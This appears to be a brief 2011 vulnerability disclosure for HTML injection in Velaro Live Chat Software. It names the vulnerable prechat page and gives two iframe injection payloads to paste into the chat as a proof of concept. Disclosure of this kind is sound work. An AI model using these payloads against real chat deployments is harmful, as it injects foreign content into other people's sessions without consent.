Velaro Live Chat Software suffers from an html injection vulnerability.
4048939afeb642f142f711cdc2622a412945997a5bdfe0ec7a522d67e2862c49
# Exploit Title: Velaro Live Chat Software Cross Site Scripting
# Date: 29.08.2011
# Author: Sony
# Software Link: http://www.velaro.com/features/live-chat
# Version: all version
# POC:
http://st2tea.blogspot.com/2011/08/velaro-live-chat-software-cross-site.html
..................................................................
This is Html Code Injection in the Velaro Live Chat Software:
http://www.velaro.com/Portals/0/prechat-choose.html
Put our code in the chat:
< iframe width="420" height="345" src="
http://www.youtube.com/embed/dzLbdsEV9iQ" frameborder="0"
allowfullscreen></iframe >
or
< iframe src="http://st2tea.blogspot.com/" >
Some pics:
http://i52.tinypic.com/7122hw.jpg
http://i55.tinypic.com/jaklsl.jpg